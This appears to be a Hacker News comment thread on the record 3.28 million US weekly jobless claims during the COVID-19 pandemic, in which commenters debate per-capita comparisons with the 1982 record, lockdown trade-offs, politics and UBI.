60% of Millennials (basically people in their 30s) don't have enough saved for a $1,000 emergency: https://www.cnbc.com/2018/12/19/60-percent-of-millennials-ca...

bagacrap(10000) 1 day ago [-]

Yeah, not great, but the same thing has happened to many businesses. When they stop making money they can't meet their obligations (e.g. wages) and need a bailout a week later.

throwaway_USD(10000) 2 days ago [-]

Everyone should expect the stock market to thrive off this data today...

czbond(4312) 2 days ago [-]

I expect you are being facetious. The reason the market is up is a short squeeze.

generalpass(4226) 2 days ago [-]

> Everyone should expect the stock market to thrive off this data today...

There are too many huge announcements for anyone to claim they can tell why the (millions?) of individuals whose actions are reflected in market prices did what they did, as opposed to noise.

treyfitty(4266) 2 days ago [-]

Why's that? I see that the S&P 500 is rising... but why is this 'good news' for businesses?

abootstrapper(4325) 2 days ago [-]

And the stock market loves it? I'm so confused.

01100011(10000) 2 days ago [-]

It may be a temporary bump. I'm still debating pulling some money out of the market for a while. I'd still be buying via my 401(k), so I'm not totally out, but I just feel like the fundamentals will pull the market down for a while. Then again, we will probably finally start to see (stag|in)flation soon, so holding cash may be a bad move.

jostmey(2451) 2 days ago [-]

That's about 1% of the US population to put it in perspective

markvdb(4292) 2 days ago [-]

3.28×10^6 people is 1.59% of the 206×10^6 US working-age population. [0]

For comparison, in my native Belgium, 18.38% of the working age population receive temporary jobless allowances due to corona [1].

[0] https://fred.stlouisfed.org/series/LFWA64TTUSM647S

[1]https://www.tijd.be/politiek-economie/belgie/federaal/overhe... (Sorry, Dutch language source only)

hyperbovine(4094) 2 days ago [-]

And a far higher percentage of the workforce.

helen___keller(10000) 2 days ago [-]

My biggest concern is that we aren't working on the infrastructure and cultural shift that is going to be needed to have a return to normal.

The endgame of covid-19 is herd immunity, which requires either 30-60% of the population infected and recovered, or a vaccine. Realistically, both are probably 9+ months out: vaccines are slow to develop, and almost every governor has proven they'd rather shut down everything than see hospitals overloaded.

In other words, for the next 6-12 months we have two choices:

(a) Public life sees a boom-bust pattern of sickness, where we open things back up, then a new outbreak of infection happens, and everything shuts down again for 2-6 weeks.

(b) We aggressively fight off our initial outbreak, then build infrastructure to quickly identify and contain all infections. We gently reopen life back to a kind-of-normal state of permanent semi-quarantine until a vaccine arrives.

In my opinion, (b) is clearly the optimal approach. And yet we haven't even begun working on the infrastructural and cultural changes needed to support pre-herd-immunity public life.

We need mass production of face masks and a culture where it is unacceptable to not wear a face mask in public, particularly crowded locations and public transit.

We need every building, every bus and train, every tourist attraction, testing every visitor with a contactless thermometer. If you have a fever you get a covid-19 test.

To allow non-remote-capable work to resume, any jobs that are remote-capable should remain remote until we have herd immunity. More people leaving their homes means a higher risk of an outbreak, and when an outbreak happens, non-remote-capable employees are the ones screwed over.

As much as I distrust the CCP and China's official numbers, it takes just one glance at the measures being taken in China to see that China is a thousand times more serious about containing this virus than we are, and that's going to play in their favor in getting things back to normal. Here's an eye-opening video on some of the steps Nanjing has taken to prevent an outbreak:

https://www.youtube.com/watch?v=YfsdJGj3-jM&feature=youtu.be

The simple fact is we're lacking the national leadership to make an effective response to this disease.

bin0(4124) 2 days ago [-]

Cultural changes? How would you build those? The government doesn't control the culture. How would you make it unacceptable? Bureaucrats don't have direct control over that. Also, a bunch of 'we need's about the ideal situation don't do much.

The reason China contained it is that it is an authoritarian state. While that provides certain advantages in this situation, it comes with certain drawbacks: not being able to access many websites, inability to express your political opinion, inability to own a firearm, being tossed in a concentration camp if the government doesn't like you. This isn't a question of leadership; you're asking the government to do things it literally has no power to do, things entirely outside of the constitution.

max93(4326) 2 days ago [-]

The stock market rises after the announcement...

quickthrowman(10000) 2 days ago [-]

Yes, a higher unemployment number was expected. Did you think unemployment going way up wasn't already partially priced in?

1zael(10000) 2 days ago [-]

Welcome to the Great Depression of the 21st century.

asdfasgasdgasdg(10000) 2 days ago [-]

Things are bad enough without exaggerating the situation. The big problem with the Great Depression was not the size of the crash but the duration of the recovery. Our management of the money supply seems a bit more effective these days, and it seems unlikely that the recession that comes out of this situation will last as long.

mensetmanusman(10000) 2 days ago [-]

A year from now, will we look back and say the suffering was worth it for something 5x as bad as the flu? (Based on Germany's numbers, which more fully account for those with mild symptoms.)

This shows how important random testing is: if the denominator is low because you are only testing those in the hospital, it looks like the second coming of the Spanish flu.

graeme(2968) 2 days ago [-]

Germany hasn't reached health-system overwhelm. When systems are overwhelmed, the death rate spikes, both from corona and from other causes that now can't be treated.

gnulinux(3609) 2 days ago [-]

Who cares if it's 5x the flu? I understand that you don't want to be proactive, but can you at least be reactive? Hospitals are already overwhelmed by COVID, and we're barely getting started. It simply doesn't matter if it's 5x the flu or 0.5x the flu: if it infects millions of people in a matter of weeks, since no one has immunity to this disease (unlike the flu), it's going to collapse the health system. Once the health system collapses, deaths will follow.

lm28469(10000) 2 days ago [-]

> based on Germany's numbers, which are more fully accounting for those with mild symptoms

It's only '5x' the flu (you say so, I didn't look it up) BECAUSE everything is locked down. If we continued to live and work as usual, hospitals would be overcrowded (they already are in Italy, Spain and some parts of France), which means a bicycle accident, a car crash, or a bad fall could kill you, because no one could take care of you. In Italy they had to call in the army to get more body bags and more people to carry out the dead; NY is already running out of space to store dead people.

You can't just take low numbers that are due to aggressive lockdowns, project them onto your imaginary world, and draw conclusions while ignoring all the side effects.

matwood(10000) 2 days ago [-]

Even if we raise the denominator to make the percentages look better, there is no denying that hospitals are being overwhelmed. The flu already pushes hospitals to the edge, so something even only (heh) 5x worse will cause most hospital systems to collapse.

treyfitty(4266) 2 days ago [-]

For context, the previous record was ~680K in the early 1980s.

allcentury(10000) 2 days ago [-]

Also worth noting that the population then was 231 million, of which 110 million were in the labor force.

So today: 3M / 160M ≈ 1.9%

1982: 670K / 110M ≈ 0.6%
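
The comparison checks out; a quick sanity check with the rounded figures from this comment:

  # Initial claims as a share of the labor force, then vs. now.
  print(f"1982 record: {670e3 / 110e6:.1%}")   # ~0.6%
  print(f"2020 week:   {3e6 / 160e6:.1%}")     # ~1.9%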

bearjaws(10000) 2 days ago [-]

Anecdotal, but my company is hiring 2x support and 2x QA. Yesterday alone we went from receiving 5-10 applicants a day to 53, and I just got into work and there are already 21 more from last night.

castratikron(10000) 2 days ago [-]

Just curious, did your company get an essential business exemption from any stay at home orders?

dubcanada(4144) 2 days ago [-]

Canada is at 1 million, or about 5% of our labour force. And it's only going to go up from here.

I have no idea how they are going to handle any of this; having that percentage of your population on EI is going to hurt.

nahname(3891) 2 days ago [-]

I have heard similar estimates, and found an article corroborating this.

https://www.theglobeandmail.com/business/article-unemploymen...

wpietri(3461) 2 days ago [-]

And as an econ/business reporter points out, this should be seen as a lower bound on the true number of lost jobs, because there are a lot of reasons people didn't file, including confusion, overwhelmed systems, and many lost jobs not qualifying: https://twitter.com/bencasselman/status/1243147516784324608

toomuchtodo(1510) 2 days ago [-]

This is also only the beginning, as lockdowns across the nation aren't in full swing yet.

notyourday(4316) 2 days ago [-]

It is going to be much worse.

This is the first week when managers and companies started to pay attention to what is happening.

Small companies are going to lay people off this week and next week. Mass layoffs take time, as a lot of states have something like a WARN act.

One should also remember that most of the tipped restaurant industry gets tips on credit cards, which are included in the next weekly or bi-weekly paycheck. That means people still had money coming in the week of the lockdown and last week; it's this week's and next week's paychecks that will have nothing in them.

Here's how you'll know we are starting to accept reality: Uber and Lyft miss their revenue numbers, and at least one of the on-demand delivery services abruptly closes. Ordering food at the markups of DoorDash/Postmates/UberEats/Grubhub is denial.

est31(3611) 2 days ago [-]

To make sure I understand correctly: this is not the total number of unemployed people, but the number of people who became unemployed recently and have now filed the forms? Then that number is gigantic, wow.

johnpowell(4332) 2 days ago [-]

This is the number of people that filed for unemployment in the last week. A staggering number. Just seven days of data.

skrowl(4188) 2 days ago [-]

The USA is home to ~340 million people (many people here illegally aren't counted). Only about 63.4% (~215M) of them work.

https://tradingeconomics.com/united-states/labor-force-parti...

ian0(3674) 2 days ago [-]

How is our social system so fragile?

I mean, seriously: thousands of years of civilization, wireless comms and rockets to the moon, and not only do we forget to prepare for a virus (something that has happened routinely throughout our history), but when it hits and people have to stay at home for a few weeks, the economy falls down and leaves millions of people who want to work unable to do so.

TeMPOraL(2761) 2 days ago [-]

It's just a consequence of the market economy. Everyone is under pressure to 'cut out fat', to make themselves 'lean'. That applies everywhere across the supply chain. The first things to go are redundancy, buffers and spare capacity, the very things that would mitigate a crisis like this. That's because the companies that 'cut out fat' can grow faster, sell cheaper and profit more than competitors whose risk horizons are longer than a few months.

What needs to be done is to legally mandate buffers and redundancies (so that no one can gain a competitive advantage by omitting or removing them). Many countries had that after the Second World War. Unfortunately, out of the woodwork came people screaming 'efficiency!' and it was all cut out.

cloverich(10000) 2 days ago [-]

Because people previously (falsely) believed it could not happen in the US, the last true pandemic being so far in the past. The Bill Gates TED talk from 2015 shows that some people understood what we should have done, but acting on it involves not only changing minds but also putting money into it. Whatever the total fallout from this pandemic, I expect the creation of a medical reserve (as suggested in the talk) is one change that will certainly happen.

wmeredith(2833) 2 days ago [-]

This is hubris talking. Nature can humble us at any time, and we can do little to nothing about it. Not to say we shouldn't try. But humanity vs. the worst things the environment can dish out (supervolcanoes, asteroids, superbugs) isn't really a contest at all. COVID-19 isn't even an extinction-level event.

lossolo(3951) 2 days ago [-]

> thousands of years and wireless comms and rockets to the moon

Every society is three meals away from chaos.

lonelappde(10000) 2 days ago [-]

Rare catastrophes are hard to prepare for, because preparation is expensive.

'Routinely happening' once a century or two isn't an easy target.

abyssin(10000) 2 days ago [-]

Don't even start thinking about climate change, a phenomenon we're completely aware is happening but still do nothing about, despite consequences that will be worse than this virus.

minikites(2229) 2 days ago [-]

'My goal is to cut government in half in twenty-five years, to get it down to the size where we can drown it in the bathtub.'

NamTaf(4318) 2 days ago [-]

3.28 million? Really?

With the lockdowns of retail, hospitality, etc. in Australia, a country of 25 million total, we've seen something north of 800,000 unemployed (temporarily or permanently). This can't be an accurate figure, surely!

nhumrich(4206) 2 days ago [-]

Your number actually makes this one sound more reasonable: 800K out of 25 million is about 3%, while 3 million out of a US population of 300 million is 1%.

rchaud(10000) 2 days ago [-]

> in Australia, a country of 25 million total

The US has 13x-15x the population of Australia, so the numbers will be larger. In any case, these are the claims filed in the past week only, and not a cumulative count of the total number who are currently unemployed.

jeltz(4168) 2 days ago [-]

This is just the people who filed last week; there are bound to be many more soon. And I am not sure everyone who has lost their job is eligible.

lettergram(1405) 2 days ago [-]

And this is only the beginning... if you look for projections (or run your own [1]), we will need a hard nationwide shutdown for at least 2-3 months (not 2 weeks) for this to not kill a million plus Americans.

I suspect even if a shutdown is lifted, when people start seeing body counts it's not like they'll return to traveling or eating out.

We'd probably need to see an antibody test and/or a vaccine first. This is going to take years to recover from.

[1] https://austingwalters.com/covid-19-vs-the-economy/

Slartie(4249) 2 days ago [-]

Well, the antibody tests are coming in a matter of weeks - multiple approaches have already been developed and are currently being validated, that is, checked that they trigger reliably on the coronavirus antibodies and ONLY on those, not on similar ones (source: Charité Berlin - the virology lab there is at the forefront of developing coronavirus tests and assists in validating new antibody tests).

They will allow us to run large randomized studies in the population and finally determine the 'real' percentage of people who can be considered immune, which is the key element currently missing in all projection models. Having that data, more realistic projections can be made as to how fast the virus will resume spreading if we lift specific restrictions. At the moment, we can only hope this number is far larger than expected.

But doing such studies takes time, and without their results, lifting any of the restrictions is going to be a dangerous gamble with public health. So I would also expect most restrictions to stay in place for about 2 months, and then maybe a slow and gradual opening: first schools, then essential day-to-day businesses, and travel/leisure last.

However, antibody tests are not a substitute for a vaccine. Only a broadly available vaccine will give people enough confidence that they won't contract the disease to start living a normal life again. We can't expect any kind of normality in the economy until this happens, regardless of whether 'America (or any other country) is open for business' again or not - because an open business is worth nothing if the customers stay away.

AznHisoka(3087) 2 days ago [-]

Other countries are also facing this crisis, at different stages. So traveling won't be back to normal for a long time.

duxup(4060) 2 days ago [-]

Semi tangent, about dealing with mass unemployment.

I like to think this event changes people's perspective on folks out of work in the US. There's a lot of recrimination, and even self-loathing, about being poor or out of work here. It doesn't seem based in reality and certainly isn't helpful.

Perhaps it is time we realize that, much like a pandemic, things in this world change fast, and we need to be able to help folks who are out of work pick up skills quickly / retrain (and maybe retrain employers to see that people with a 'different' resume might actually be able to do other jobs) so that they can get back on their feet.

Maybe it won't be a pandemic, but things are changing fast: whole industries of people find themselves offshored, jobs change, etc. I think we need to plan for / get comfortable with the idea that, on a smaller scale, we should be ready to deal with such things dynamically over the course of people's lives with retraining, support for it, and so on. And maybe a workforce with a variety of experiences will be better for it.

draw_down(10000) 2 days ago [-]

Saying things like 'maybe we need to realize that...' and so on is nice, and important. But unless things change materially it won't do much. People need leniency, but they need it in more than just the disposition of those around them. They need leniency on rent, they need money to live. These are material needs.

Yesterday, a small group of senators threatened to hold up the bill that offers (pitiful, way too little) relief to workers. They did this because they were concerned the government would be giving too much to workers, such that people would begin choosing not to work.

It's (hopefully) clear that this is plainly ridiculous, and evil behavior. I don't bring it up to say those people are horrible - which they are. I bring it up to point out that this is the ideology and the environment we have to contend with.

People need help but our system is intentionally designed not to give it to them.

dragonwriter(4341) 2 days ago [-]

> I like to think this event changes people's perspective on folks out of work in the US.

Sure, just like the Depression did.

And just like the Depression, a few years of boom times afterwards and that effect will be negated until the next similar event.

jimbokun(4154) 2 days ago [-]

Reading your post made Andrew Yang's voice pop into my head:

'And do you know what would really help those people while they retrain for new jobs? A thousand bucks a month!'

gonzo41(10000) 2 days ago [-]

In Australia, they closed all the 'non-essential' industries, which turns out to be about 30% of the workforce. I keep thinking the big shift will be that when people come out of this, they won't allow themselves to be 'non-essential' ever again. They won't take back those jobs; they'll push for agreements that guarantee a safety net.

vikramkr(10000) 2 days ago [-]

I'm more cynical - it's very easy to justify losing your job now as driven by external factors, while seeing losing your job before as an internal failing. If people get their jobs back within the next few months, I think it could breed a sense of superiority: 'I got my job back during the coronavirus, and you couldn't even get a job in one of the biggest boom markets ever.' There's no basis in reality for looking down on the poor, like you said, and I don't know if this shock will force people to really understand reality as you hope, or simply become the basis of a new false understanding, as I fear.

sizzle(749) 1 day ago [-]

I can't help but draw a parallel to how machine learning and AI automation are supposed to disrupt a majority of blue-collar jobs, and wonder if this is a taste of what is to come when we crack the code and people's skills are rendered obsolete by specialized, sophisticated machinery that outperforms us on every metric and runs autonomously 24/7.

I also think about universal basic income and what life would feel like if I were suddenly left to my own devices and had the luxury to learn any subject I wanted, pursuing new hobbies and crafts without dragging myself into work through stop-and-go traffic both ways, sapping my creative energy and making me a more jaded person day by day as the week progresses.

cloverich(10000) 2 days ago [-]

Frankly, we have a formal education system that is actively hostile to training people to do jobs, and instead teaches 'fundamentals' and 'how to learn'. There's tremendous support for those concepts, though I personally consider them bogus. If we truly want cross-trained people, the education system is the one that needs to change. Otherwise the funding and time that could be used for job training will always be soaked up by it. My humble opinion.

I know it's not a popular opinion, but when I see my nanny wanting to get ahead by taking night classes, and those classes have her studying and writing 19th-century poetry... I can't help but feel deeply frustrated by the disconnect. How could she possibly stay motivated to finish school, when it's only giving her hoops to jump through and no practical skills to get into a better job? How could I convince her to e.g. take programming lessons from me, when society and her parents are telling her a college degree (that, at this rate, she's unlikely to obtain) is what will help her most? /rant

dpcan(4250) 2 days ago [-]

Being a sole proprietor / contractor right now feels hopeless. Nobody is spending money with me right now, projects on hold, no possible way of filing for unemployment. It's worrisome.

Thankfully my wife is still working - but she's an administrator at a Nursing Home and people there are starting to get tested - and she's panicking. They are days from having no nurses. She's worried about cleaning crews being sick. She's worried about bringing it home. Luckily they have a stockpile of supplies, BUT THIS WHOLE THING IS ABOUT TO BLOW UP!

The problem is that the tests of their employees are taking UP TO 10 DAYS to come back. They are sending nurses home for that long just to wait and see whether they have all been exposed, and their residents too.

Anyone in their facility who may be sick is being sent home for 14 days. There will be nobody left to take care of the elderly, who may also get sick.

People are worried about dying themselves, or the people they care for dying.

I'm confident we are 10 days from hearing about nursing homes everywhere, and the nurses in them, getting sick and dying in massive numbers.

cheeze(10000) 2 days ago [-]

> Being a sole proprietor / contractor right now feels hopeless. Nobody is spending money with me right now, projects on hold, no possible way of filing for unemployment. It's worrisome.

Please don't take this as me being captain hindsight here, but I think that this pandemic has reallllly shown the need for an emergency fund. IMO if you're sole prop or contractor, you owe it to yourself to have a bigger emergency fund for this exact scenario.

vsareto(4247) 2 days ago [-]

I don't think you'll be hearing much about nursing homes: https://arstechnica.com/tech-policy/2020/03/feds-decline-to-...

avalys(10000) 2 days ago [-]

Check out the details of the small business forgivable loan package just passed by the Senate. I think they took some actions to help sole proprietors and self-employed people also.

PaulRobinson(4079) 2 days ago [-]

A staggering number, and unprecedented in the modern era.

I'm not in the US or an American, but my (retired) father is, and for the sake of the people around him and his family I hope this is the point where the American political system - and Republicans in particular - realise that their ideologies are dead.

In the UK we saw an Old-Etonian Tory Prime Minister in the space of a couple of weeks:

- Effectively nationalise a huge chunk of private industry by offering to subsidise 80% of all salaries up to £30k/year

- Delay tax payments for businesses, and offer up to 15% of GDP in loans and grants to help keep them alive

- Renationalise the train industry (privatising it and others was a hallmark of Thatcher's period in power)

- Accept that their planned immigration policy post-Brexit is now probably dead in the water because who knew that 'low skilled workers' like cleaners and agricultural workers would be useful?

- Severely curtail free movement and enterprise by shutting every pub, restaurant, cinema, theatre and cafe across the UK as well as almost every shop that isn't a pharmacy or food shop

- Become champion supporters of an NHS they were - until recently - trying to sell bits of

Politics here has changed forever, and likely for the better (assuming the restrictions on free movement and enterprise are temporary and not a back door for more draconian measures). For the sake of the most vulnerable in America, I hope it's the same there too.

And maybe - just maybe - it's time everybody took another look at the UBI debate, again.

gadders(770) 2 days ago [-]

>> - Become champion supporters of an NHS they were - until recently - trying to sell bits of

There is no evidence for this whatsoever; it is just the usual Labour dog-whistle claim against every Tory government.

9nGQluzmnq3M(2694) 2 days ago [-]

> Politics here has changed forever

Unlikely. I think we'll be back to business as usual (at least on the political side) within a year of the end of the pandemic.

I'm also afraid that this is going to be a major setback not just for Europe but globalization in general, which will leave us all worse off in the long run.

string(10000) 2 days ago [-]

Can you keep the comments like this on Reddit and away from HN, please?

For the non-UK users reading this: almost all of the bullet pointed statements are either incorrect or exaggerated.

wmeredith(2833) 2 days ago [-]

> and Republicans in particular - realise that their ideologies are dead

Good luck. Their base doesn't care. I was speaking with my father a couple days ago, a US board-certified surgeon who ran his own practice for 40 years. He's a smart guy, but firmly lives in the Fox News/Rush Limbaugh bubble. He was saying how he was hoping this crisis would put the final nail in the coffin ... for the corrupt Democrats. It's insanity.

j4kp07(10000) 2 days ago [-]

> Republicans in particular

It was the Democrats that held this up over carbon emission and diversity standards, and to game the upcoming elections in November.

> I'm not in the US or an American...

Of course.

TMWNN(4190) 2 days ago [-]

>- Become champion supporters of an NHS they were - until recently - trying to sell bits of

Private Eye on '24 Hours to Save the NHS': https://twitter.com/KulganofCrydee/status/833654730849136641

switch007(10000) 2 days ago [-]

> - Renationalise the train industry

That's not quite what's happening. https://www.railwaygazette.com/uk/uk-train-operators-offered...

sago(4337) 2 days ago [-]

Sadly, I think the effect might be the opposite. The massive financial hardship seems poised to produce a backlash in which a group promoting 'the economy above all else' gains the support of millions who feel their financial future has been unfairly taken.

I see little threads fraying already.

I have heard even normally fairly left-leaning people saying variations of 'this will kill more people from poverty'.

simonswords82(2945) 2 days ago [-]

Hi Paul, epic post - and so true.

I was watching CNN last night with my Canadian wife (I'm English) and I couldn't believe the BS being thrown around, when all we really want to see from the USA is concrete action like what many other nations, including the UK, have achieved.

Saw your tweet about boycotting companies btw, you'll like this: http://www.whencovidisover.co.uk/

shripadk(4157) 2 days ago [-]

> And maybe - just maybe - it's time everybody took another look at the UBI debate, again.

Doesn't UBI directly result in inflation and cause currency devaluation? If the money that you hold loses its value (because everyone has at the very least the same amount of money as a basic, consistent income) then it is worth nothing in the end. It is as good as having no money in my humble opinion. Money has to be valuable for it to be useful in trade. Giving away money to everyone devalues the currency.

mtberatwork(3613) 2 days ago [-]

I would like to be optimistic and think we all learn valuable lessons from this but realistically most people will just double-down in their convictions and blame some other externality as to why their own political/economic ideologies didn't pan out.

martinald(3981) 2 days ago [-]

Minor point - the rail industry was privatised by John Major. Thatcher was against, or at least indifferent to, privatising it.

stupandaus(3560) 2 days ago [-]

A few things to note:

1. These figures are only new claims as of 3/21, so the numbers will get worse.

2. This is ~2% of the estimated ~160-165M US Workforce.

3. This is nearly 5x (!) the prior record of 671K new jobless claims from 1982, and redefines the scale for jobless claims. [1]

4. This does not account for the countless gig workers that are part of the modern economy that likely did not file for unemployment since they were not covered prior to the passing of the senate bill last night.

This goes to show just how sharp of an impact the coronavirus pandemic has had relative to past recessions. Even the '08 Financial Crisis took MONTHS to unravel.

[1] https://fred.stlouisfed.org/series/ICSA

neycoda(10000) 1 day ago [-]

This goes to show how damaging it is to ignore health officials.

nck4222(4341) 2 days ago [-]

>4. This does not account for the countless gig workers that are part of the modern economy that likely did not file for unemployment since they were not covered prior to the passing of the senate bill last night.

You (and others) are probably aware, but it's worth pointing out that these people still cannot file for unemployment benefits until the House passes the bill, the Senate approves any House amendments, and the president signs it.

The House isn't voting on this until tomorrow at the earliest, so there's still a ways to go.

There are probably others as well who have had their pay reduced and are waiting to see what gets passed before filing for benefits. Anecdotally, I know of some software engineers in this boat.

pc86(4003) 2 days ago [-]

2008 took months to unravel because of the nature of the crisis. Foreclosure is a process and in some areas can take up to 6 months or more from the time you stop paying your mortgage.

Here we had state governments practically shutting down their economies overnight. Overnight, every restaurant in my state was no longer allowed to offer dine-in service. Only maybe half in my local area stayed open for carryout, and at least 80% of those have closed in the few weeks since.

The speed at which this happened is astronomical, but that doesn't necessarily mean that it's going to be multiple times worse than 2008. Just that the onset was very quick.

pengaru(10000) 2 days ago [-]

> 3. This is nearly 5x (!) the prior record of 671K new jobless claims from 1982, and redefines the scale for jobless claims. [1]

This should be normalized per capita; comparing absolute figures is distorted by population growth. The US had only 230M people in 1982, 100M fewer than today.

After normalizing, it's more like 3.4x.
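
The normalization is a one-liner; here's a hedged C# sketch using the approximate figures above:

    using System;

    class PerCapitaRecord
    {
        static void Main()
        {
            // 1982 record vs. the new figure, each divided by the population of its era.
            double claims1982 = 671_000,   pop1982 = 230_000_000;
            double claims2020 = 3_283_000, pop2020 = 330_000_000;
            double ratio = (claims2020 / pop2020) / (claims1982 / pop1982);
            Console.WriteLine($"Per-capita multiple of the 1982 record: {ratio:F1}x"); // ~3.4x
        }
    }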

sct202(10000) 2 days ago [-]

I definitely know more people laid off this week than last week. No one was really sure how much business they could sustain with this whole thing going on, and now that there's been a full week and a partial week, employers are starting to pull the plug.

luma(10000) 2 days ago [-]

Further, unemployment benefits are managed by the states, and those states are running web services which typically see a few hundred hits a day. They are now trying to process tens of thousands of new records each day, and at least in MI the service is absolutely not up to the task.

My wife managed to get her filing completed a little after 1am this morning. She was the only one of her 20 coworkers to successfully file, the rest are continuing to attempt to get the state web site to work today, while more people pile in.

These numbers are going to get much, much worse.

rixrax(4255) 2 days ago [-]

And yet the DJIA is up almost 1000 points. Is this the stimulus $$$ at work, or what is going on here?

cableshaft(4320) 2 days ago [-]

This also doesn't take into account those who have had reduced hours or salary at their jobs, like my wife's entire company (at least the employees who didn't get furloughed). She got reduced to 3 days a week, for a 40% salary reduction.

mikorym(4263) 2 days ago [-]

Not from the US, so not quite in phase with how things work. What can this tell us about actual unemployment, and the actual number of people who won't have a job now (short term, medium term, or forever)?

claudeganon(3646) 2 days ago [-]

> This goes to show just how sharp of an impact the coronavirus pandemic has had relative to past recessions. Even the '08 Financial Crisis took MONTHS to unravel.

I think we need to couple the two events a little more closely. The 2008 Financial Crisis accelerated inequality, political instability, asset inflation, and the rise of precarious work to such a degree that the damage of this hit is being greatly compounded.

To my mind, the hole that was the 2008 crisis was papered over and someone just came by and dropped a brick on it.

wil421(4130) 2 days ago [-]

The financial crisis didn't prevent most people from spending money on entertainment or eating out. People scaled back spending or went to cheaper places.

People are fearful, and a lot of folks are supposed to be sheltering in place. Businesses are being told to do takeout only, which is a huge difference.

I was in the restaurant industry during the last crisis. Lots of places stopped hiring and slowed down but business didn't suddenly stop.

mrfusion(700) 2 days ago [-]

What is the process for freelancers to get unemployment? I think that was mentioned in the new stimulus?

mempko(4112) 2 days ago [-]

Yes, you can thank Bernie Sanders for that.

cjslep(4316) 2 days ago [-]

I grew up with the puritanical mindset of: 'Your intrinsic worth as a human is the money you earn; because the money you earn is from how hard you work; and how hard you work is a reflection of your intrinsic Virtue.'

Thus I grew up in a family that loathes the unemployed. I really hope -- though I have grave doubts -- that this event gets through to them, so that they can have some personal growth, too.

twoquestions(4267) 2 days ago [-]

One of my big hopes is at the end of this mess, the Protestant Work Ethic and Prosperity Gospel go down in flames.

This event should show anyone with even a bit of sense that your 'virtue' is only a small part of your economic power.

Kaze404(10000) 2 days ago [-]

That is the saddest thing I've ever read on this site. I know there's people who believe that but it's still shocking to me.

mrfusion(700) 2 days ago [-]

Sadly everyone seems to be doubling down on their existing strong opinions.

(Any ideas to improve that?)

tr33house(4283) 2 days ago [-]

I think this is wrongly attributed as puritanical

bbxxcc(10000) 2 days ago [-]

I think loathing the unemployed (especially if it isn't caused by health conditions and isn't temporary, like in this case) is commonplace in any society. There are many studies which show that unemployed people are more likely to commit crimes, e.g. [1]

Unemployed people, by definition, are net consumers. [2] Unless society as a whole actually produces wealth, there is nothing to tax, and the government doesn't have any money to spend. And how does wealth get created without people in employment? Unless you are the country with the reserve currency, which effectively gives you the ability to keep printing money until the world catches up to the con. That still doesn't change the underlying economics; it is just that at any given point in time there is always some country using its reserve-currency status to make it appear as though you can create wealth by printing more money.

Aiming for more employment is a net positive to any society, and I think that is what conditions people to loathe the permanently unemployed.

[1] https://www.jstor.org/stable/40057352?seq=1

[2] I remember reading an essay by PG about how getting employment is when you go from being a 'net consumer' to being a 'net producer'; I cannot find the link.

rubber_duck(10000) 2 days ago [-]

And this is just the start.

While I think the US response to the coronavirus was slower than the response in my country, I feel the US is the only country that's seriously discussing the economic repercussions and debating the medical experts.

In the EU (at least in my country) it's doctors running things, and we are in 'stop the pandemic at all costs' mode. Everyone is in a panic due to the situation in Italy. But doctors are only trained to see the medical side of the picture - and there is a point at which this approach to fighting the virus is going to have worse consequences than a full-blown pandemic itself. I don't see anyone publicly discussing this point around here.

sundaeofshock(4011) 2 days ago [-]

Seriously? There were a number of submissions yesterday to HN discussing the relative merits of sacrificing millions for the sake of the market. Perhaps you missed those?

lbeltrame(10000) 2 days ago [-]

Unfortunately yes. Even if one wants to keep the quarantine at all costs, it should be a political decision, not only medical, after weighing everything.

In Italy, where I'm in my third week of being shut in, experts and doctors are being quoted tirelessly by the news. The problem is that they're doing their job (which is good!) but do not realize the impact of their suggested measures. Not their fault by any means, but:

a. They're effectively scaring the population (a WHO advisor here suggested a 6-9 month lockdown, which is likely impractical and would have devastating consequences for the social fabric, even before considering the economy)

b. The politicians are so scared of the virus that they're completely abdicating their functions (in Italy the Parliament was closed for two weeks, and the judicial system has been completely shut down as well) and doing whatever they're being told.

brightball(3951) 2 days ago [-]

The issue with the framing of this topic also boils down to who asks it.

I often hear it framed as: 'How much is a person's life worth?' or some general reference to stock values.

But when people say 'economy' this is what it really means:

https://www.bbc.com/news/world-asia-india-52002734

Cash flow, supply chains, jobs, bankruptcy, debt, poverty, famine and more than likely families breaking up (financial stress is the #1 cause of divorce) plus a spike in suicides.

That's the economic impact. And when you weigh virtually guaranteeing that outcome around the world for a significant portion of the global population against the risk of a negative outcome for the percentage of people who are susceptible to serious complications from COVID-19... it gets a heck of a lot murkier.

There's not a heartless bad guy in this situation. Both outcomes are terrible, and if you purely look at the number of people negatively impacted, the economic fallout of this approach, with its cascading effects, looks significantly worse.

lordnacho(1856) 2 days ago [-]

I think it's a fair discussion to have, but how are you going to run an economy with the health service in permanent overload?

That is what would happen if you just let the thing pass. Those charts of 'squashing the sombrero' have the number of beds at a very low place compared to the expected hump of cases. On some of them you can barely even see the gap between the red line and the zero line, due to the scale of the hump.

Death rates would shoot up way above what is normal for the disease, people would die of all sorts of other preventable things too.

smallgovt(3949) 2 days ago [-]

For those who are willing to go through this thought exercise, if we're purely trying to maximize humankind's total well-being, how much wealth would we have to create to counteract one coronavirus victim's loss of life?

Here's a set of 3 questions that I think leads to a possible answer.

- How much would someone have to pay you to be put to sleep for 8 years, during which period you have no sensory input or output?

- Would you rather be put to sleep for 8 years now or at the end of your life?

- Do you have a preference over being put to sleep for the last 8 years of your life vs just dying straight up?

I think most people would be willing to go to sleep for 8 years for $2 million. And most would prefer dying 8 years sooner over going to sleep now.

In other words, $2m > sleep for 8 years now > dying 8 years earlier == coronavirus victim

The moral dilemma is that we're asking one person to die 8 years sooner to create an offsetting improvement in quality of life for someone else. That is, you're taking away well-being from one person to give to another. Government officials implement policies that redistribute human well-being all the time, but it raises alarm bells when we start dealing with life and death.
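
Under the commenter's own assumptions, the implied trade reduces to a simple division (a toy C# calculation, not a real policy figure):

    using System;

    class LifeYearValue
    {
        static void Main()
        {
            double compensation = 2_000_000; // assumed price of 8 years of "sleep"
            double yearsLost = 8;            // assumed life-years lost per victim
            // Implied upper bound on the dollar value of one life-year:
            Console.WriteLine($"${compensation / yearsLost:N0} per life-year"); // $250,000
        }
    }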

SamuelAdams(3949) 2 days ago [-]

I saw this idea floated around on Reddit a few days ago. Basically the crux is that unemployment has a death toll, too.

So if you close all non-essential businesses, unemployment rises, which increases the likelihood of people losing health insurance, losing homes, not paying electrical bills, communication (internet / phone) bills, etc. If some people lose all those things and don't have access to them again for 2+ months, and have no other safety net, they might die. Doubly so considering the hospitals may be at capacity with COVID-19 cases.

So, what would be better - keep people at home and unemployed, where people die by lack of resources, or keep people going out where people die by spreading COVID-19?

